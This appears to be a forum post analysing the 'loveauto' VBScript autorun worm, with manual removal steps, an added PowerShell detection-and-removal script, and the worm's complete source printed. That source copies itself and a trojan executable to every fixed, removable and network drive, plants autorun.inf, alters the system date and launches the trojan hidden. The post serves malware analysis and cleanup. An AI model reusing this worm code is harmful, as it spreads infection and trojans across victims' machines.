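A bit embarrassing: it's written in VB. The sample comes from the Kaka community (卡卡社区).
It's a bit of a headache; users without relevant experience may not know how to deal with it.
The "virus" consists of 4 files:
loveauto.vbs \\ Traverses the drives to drop Autorun.inf and copy itself; launched by WScript.exe. It also changes the date, among other things.
loveauto.reg \\ Breaks the "show hidden files" option
loveauto.bat \\ Applies attributes to these 4 "virus" files: read-only, hidden, system, archive
limt.exe \\ According to the virus source code this gets generated; I could not verify it.
I did not run the virus; this is based on analysis of the virus source code. Here is how to remove it:
First open Task Manager; if you see a CMD process, end it first.
From [url]http://free.ys168.com/?gudugengkekao[/url] download
PowerRMV and
显示隐藏文件.reg (a registry file that restores showing hidden files).
Run PowerRMV and enter: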
C:\loveauto.vbs
C:\loveauto.reg
C:\loveauto.bat
C:\limt.exe
C:\autorun.inf
If there are several partitions, change "C" to the corresponding drive letter.
For example:
D:\loveauto.vbs
D:\autorun.inf
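Tick the option that suppresses regeneration of killed objects, then kill; a prompt appears, just confirm it. (Ignore any files that cannot be found.)
Press F3 to search all drives, tick "include hidden files", and search using the 4 virus file names above as keywords; delete everything that is found.
After finishing the steps above, import the registry file. If the system date was modified, change it back manually.
Also: if a drive cannot be opened, use PowerRMV and enter: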
C:\autorun.inf
D:\autorun.inf
E:\autorun.inf
F:\autorun.inf
One at a time; remember to tick the option that suppresses object regeneration, then confirm.
Attached is the source of loveauto.vbs:
on error resume next
Set WshShell =CreateObject("WScript.Shell")
Set objFSO = CreateObject("Scripting.FileSystemObject")
set Of = CreateObject("Scripting.FileSystemObject")
set dir = Of.GetSpecialFolder(1) 'get the special folder dir
if WScript.ScriptFullName="C:\loveauto.vbs" or WScript.ScriptFullName="D:\loveauto.vbs" or
WScript.ScriptFullName="E:\loveauto.vbs" or WScript.ScriptFullName="F:\loveauto.vbs" or
WScript.ScriptFullName="G:\loveauto.vbs" or WScript.ScriptFullName="H:\loveauto.vbs" or
WScript.ScriptFullName="I:\loveauto.vbs" or WScript.ScriptFullName="J:\loveauto.vbs" or
WScript.ScriptFullName="K:\loveauto.vbs" or WScript.ScriptFullName="L:\loveauto.vbs" or
WScript.ScriptFullName="M:\loveauto.vbs" or WScript.ScriptFullName="N:\loveauto.vbs" or
WScript.ScriptFullName="O:\loveauto.vbs" or WScript.ScriptFullName="P:\loveauto.vbs" or
WScript.ScriptFullName="Q:\loveauto.vbs" or WScript.ScriptFullName="R:\loveauto.vbs" or
WScript.ScriptFullName="S:\loveauto.vbs" or WScript.ScriptFullName="T:\loveauto.vbs" or
WScript.ScriptFullName="U:\loveauto.vbs" or WScript.ScriptFullName="V:\loveauto.vbs" or
WScript.ScriptFullName="W:\loveauto.vbs" or WScript.ScriptFullName="X:\loveauto.vbs" or
WScript.ScriptFullName="Y:\loveauto.vbs" or WScript.ScriptFullName="Z:\loveauto.vbs" then
a=WshShell.Run("loveauto.bat open" ,0,False)
a=WshShell.Run("loveauto.bat ++ " ,0,True)
If objFSO.FileExists(dir&"\loveauto.vbs") Then 'check whether the system is already infected
wscript.sleep 10
else
a=WshShell.Run("loveauto.bat - "&dir ,0,True)
a=WshShell.Run("loveauto.bat ++ " ,0,True)
Of.CopyFile "loveauto.bat",dir&"\",True 'if not yet infected, copy the files
Of.CopyFile "limt.exe",dir&"\",True
Of.CopyFile "autorun.inf",dir&"\",True
Of.CopyFile "loveauto.reg",dir&"\",True
Of.CopyFile "loveauto.vbs",dir&"\",True
a=WshShell.Run("loveauto.bat + "&dir ,0,True)
a=WshShell.Run("loveauto.bat date " ,0,True) 'change the time
WScript.Sleep 15000
a=WshShell.Run("limt.exe" ,0,False) 'run the trojan
a=WshShell.Run("loveauto.bat hfd " ,0,False) 'restore the time
For i=1 to 2
Set dc = Of.Drives 'get all drives
For Each d In dc 'iterate over all drive letters and copy itself
If d.DriveType = 2 Or d.DriveType = 3 or (d.DriveType = 1 and d<>"A:" and d<> "B:") Then
a=WshShell.Run("loveauto.bat - "&d ,0,True)
a=WshShell.Run("loveauto.bat ++ " ,0,True)
Of.CopyFile dir&"\loveauto.bat",d&"\",True
Of.CopyFile dir&"\limt.exe",d&"\",True
Of.CopyFile dir&"\autorun.inf",d&"\",True
Of.CopyFile dir&"\loveauto.reg",d&"\",True
Of.CopyFile dir&"\loveauto.vbs",d&"\",True
a=WshShell.Run("loveauto.bat + "&d ,0,True)
end if
wscript.sleep 2000
next
wscript.sleep 50000
i=0
next
end if
else
If objFSO.FileExists(dir&"\loveauto.vbs") Then
For i=1 to 2
Set dc = Of.Drives 'get all drives
For Each d In dc 'iterate over all drive letters and copy itself
If d.DriveType = 2 Or d.DriveType = 3 or (d.DriveType = 1 and d<>"A:" and d<> "B:") Then
a=WshShell.Run("loveauto.bat - "&d ,0,True)
a=WshShell.Run("loveauto.bat ++ " ,0,True)
Of.CopyFile dir&"\loveauto.bat",d&"\",True
Of.CopyFile dir&"\limt.exe",d&"\",True
Of.CopyFile dir&"\autorun.inf",d&"\",True
Of.CopyFile dir&"\loveauto.reg",d&"\",True
Of.CopyFile dir&"\loveauto.vbs",d&"\",True
a=WshShell.Run("loveauto.bat + "&d ,0,True)
end if
wscript.sleep 2000
next
wscript.sleep 50000
i=0
next
else
a=WshShell.Run("loveauto.bat date " ,0,True) 'change the time
WScript.Sleep 15000
a=WshShell.Run("limt.exe" ,0,False) 'run the trojan
a=WshShell.Run("loveauto.bat hfd " ,0,False) 'restore the time
a=WshShell.Run("loveauto.bat - "&dir ,0,True)
a=WshShell.Run("loveauto.bat ++ " ,0,True)
Of.CopyFile "loveauto.bat",dir&"\",True 'if not yet infected, copy the files
Of.CopyFile "limt.exe",dir&"\",True
Of.CopyFile "autorun.inf",dir&"\",True
Of.CopyFile "loveauto.reg",dir&"\",True
Of.CopyFile "loveauto.vbs",dir&"\",True
a=WshShell.Run("loveauto.bat + "&dir ,0,True)
For i=1 to 2
Set dc = Of.Drives 'get all drives
For Each d In dc 'iterate over all drive letters and copy itself
If d.DriveType = 2 Or d.DriveType = 3 or (d.DriveType = 1 and d<>"A:" and d<> "B:") Then
a=WshShell.Run("loveauto.bat - "&d ,0,True)
a=WshShell.Run("loveauto.bat ++ " ,0,True)
Of.CopyFile "loveauto.bat",d&"\",True
Of.CopyFile "limt.exe",d&"\",True
Of.CopyFile "autorun.inf",d&"\",True
Of.CopyFile "loveauto.reg",d&"\",True
Of.CopyFile "loveauto.vbs",d&"\",True
a=WshShell.Run("loveauto.bat + "&d ,0,True)
end if
wscript.sleep 2000
next
wscript.sleep 50000
i=0
next
end if
end if
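The manual check from the removal steps, written as a PowerShell script; this is an added example and not part of the original post. It looks for the five file names from the post in every drive root of the kinds the script above copies itself to, and also in the system folder, which is what `GetSpecialFolder(1)` returns. The `-Remove` switch is a name chosen for this example; without it the script only reports.

```powershell
# Added example, not from the original post. Read-only unless -Remove is given.
param([switch]$Remove)

# File names taken from the post. autorun.inf is handled separately because
# legitimate media can carry one too.
$wormNames = 'loveauto.vbs', 'loveauto.reg', 'loveauto.bat', 'limt.exe'

# Roots of removable, fixed and network drives (FSO DriveType 1, 2, 3 in the
# script above), plus the system folder the script copies itself into.
$roots = @([System.IO.DriveInfo]::GetDrives() |
    Where-Object { $_.IsReady -and $_.DriveType -in 'Removable', 'Fixed', 'Network' } |
    ForEach-Object { $_.RootDirectory.FullName })
$roots += [Environment]::SystemDirectory

$found = foreach ($root in $roots) {
    $hits = @(foreach ($name in $wormNames) {
        # -Force is required: loveauto.bat sets Hidden and System on the files.
        Get-Item -LiteralPath (Join-Path $root $name) -Force -ErrorAction SilentlyContinue
    })
    if ($hits.Count -gt 0) {
        # Count autorun.inf only when it sits beside one of the worm's files.
        $hits += @(Get-Item -LiteralPath (Join-Path $root 'autorun.inf') -Force -ErrorAction SilentlyContinue)
    }
    # Skip directories that happen to use one of these names.
    $hits | Where-Object { -not $_.PSIsContainer }
}

$found | Select-Object FullName, Attributes, LastWriteTime | Format-Table -AutoSize

if ($Remove) {
    foreach ($item in $found) {
        # Clear ReadOnly/Hidden/System first so the delete is not refused.
        $item.Attributes = 'Normal'
        Remove-Item -LiteralPath $item.FullName -Force
    }
}
```

Run it after ending the CMD process as described in the post, otherwise the copy loop can put the files back between the scan and the delete.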